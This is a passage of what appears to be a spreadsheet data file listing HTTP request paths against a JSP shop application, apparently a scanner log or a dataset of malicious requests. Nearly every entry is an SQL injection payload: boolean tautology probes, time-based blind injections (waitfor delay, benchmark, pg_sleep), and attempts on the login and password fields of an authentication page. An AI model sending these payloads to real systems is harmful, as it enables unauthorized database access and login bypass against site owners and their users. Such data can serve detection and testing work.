    <t>/antoanweb/publico/caracteristicas.jsp?id=2'+and+'72'='73</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=2+or+72=72+</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=2+and+72=73+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego"+or+"51"="51&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego"+and+"51"="52&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego'+or+'51'='51&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego'+and+'51'='52&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1;waitfor+delay+'0:0:5'--&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1);waitfor+delay+'0:0:5'--&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1));waitfor+delay+'0:0:5'--&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1';waitfor+delay+'0:0:5'--&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1');waitfor+delay+'0:0:5'--&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'));waitfor+delay+'0:0:5'--&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1+or+benchmark(2500000,md5(1))&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1+or+pg_sleep(5)&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1"+or+pg_sleep(5)+or+"1"="1&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39"+or+"27"="27&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39"+and+"27"="28&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39'+or+'27'='27&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39'+and+'27'='28&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39+or+27=27+&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39+and+27=28+&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1;waitfor+delay+'0:0:5'--&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1);waitfor+delay+'0:0:5'--&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1));waitfor+delay+'0:0:5'--&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1';waitfor+delay+'0:0:5'--&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1');waitfor+delay+'0:0:5'--&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1'));waitfor+delay+'0:0:5'--&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1+or+benchmark(2500000,md5(1))&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1+or+pg_sleep(5)&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1'+or+pg_sleep(5)+or+'1'='1&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=1"+or+pg_sleep(5)+or+"1"="1&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2"+or+"32"="32&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2"+and+"32"="33&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2'+or+'32'='32&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2'+and+'32'='33&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2+or+32=32+&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2+and+32=33+&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1;waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1);waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1));waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1';waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1');waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1'));waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1+or+benchmark(2500000,md5(1))&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1+or+pg_sleep(5)&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1'+or+pg_sleep(5)+or+'1'='1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1"+or+pg_sleep(5)+or+"1"="1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1"+or+"24"="24</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1"+and+"24"="25</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1'+or+'24'='24</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1'+and+'24'='25</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1+or+24=24+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1+and+24=25+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1"+or+"92"="92</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1"+and+"92"="93</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1'+or+'92'='92</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1'+and+'92'='93</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1+or+92=92+</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1+and+92=93+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico"+or+"39"="39&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico"+and+"39"="40&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico'+or+'39'='39&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico'+and+'39'='40&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1;waitfor+delay+'0:0:5'--&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1);waitfor+delay+'0:0:5'--&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1));waitfor+delay+'0:0:5'--&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1';waitfor+delay+'0:0:5'--&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1');waitfor+delay+'0:0:5'--&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'));waitfor+delay+'0:0:5'--&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1+or+benchmark(2500000,md5(1))&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1+or+pg_sleep(5)&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1"+or+pg_sleep(5)+or+"1"="1&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100"+or+"32"="32&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100"+and+"32"="33&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100'+or+'32'='32&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100'+and+'32'='33&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100+or+32=32+&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100+and+32=33+&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1;waitfor+delay+'0:0:5'--&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1);waitfor+delay+'0:0:5'--&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1));waitfor+delay+'0:0:5'--&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1';waitfor+delay+'0:0:5'--&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1');waitfor+delay+'0:0:5'--&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1'));waitfor+delay+'0:0:5'--&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1+or+benchmark(2500000,md5(1))&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1+or+pg_sleep(5)&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1'+or+pg_sleep(5)+or+'1'='1&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=1"+or+pg_sleep(5)+or+"1"="1&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1"+or+"84"="84&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1"+and+"84"="85&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1'+or+'84'='84&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1'+and+'84'='85&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1+or+84=84+&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1+and+84=85+&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1;waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1);waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1));waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1';waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1');waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1'));waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1+or+benchmark(2500000,md5(1))&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1+or+pg_sleep(5)&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1'+or+pg_sleep(5)+or+'1'='1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1"+or+pg_sleep(5)+or+"1"="1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1"+or+"17"="17</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1"+and+"17"="18</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1'+or+'17'='17</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1'+and+'17'='18</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1+or+17=17+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1+and+17=18+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=32"+or+"32"="32&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=32"+and+"32"="33&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=32'+or+'32'='32&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=32'+and+'32'='33&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z'0&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'+or+'61'='61&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'+and+'61'='62&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1;waitfor+delay+'0:0:5'--&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1);waitfor+delay+'0:0:5'--&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1));waitfor+delay+'0:0:5'--&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1';waitfor+delay+'0:0:5'--&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1');waitfor+delay+'0:0:5'--&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1'));waitfor+delay+'0:0:5'--&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1+or+benchmark(2500000,md5(1))&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=68"+or+"68"="68&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=68"+and+"68"="69&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=68'+or+'68'='68&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=68'+and+'68'='69&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=d'z'0&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=26'+or+'26'='26&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=26'+and+'26'='27&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1;waitfor+delay+'0:0:5'--&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1);waitfor+delay+'0:0:5'--&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1));waitfor+delay+'0:0:5'--&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1';waitfor+delay+'0:0:5'--&amp;remember=</t>
  </si>
  <si>
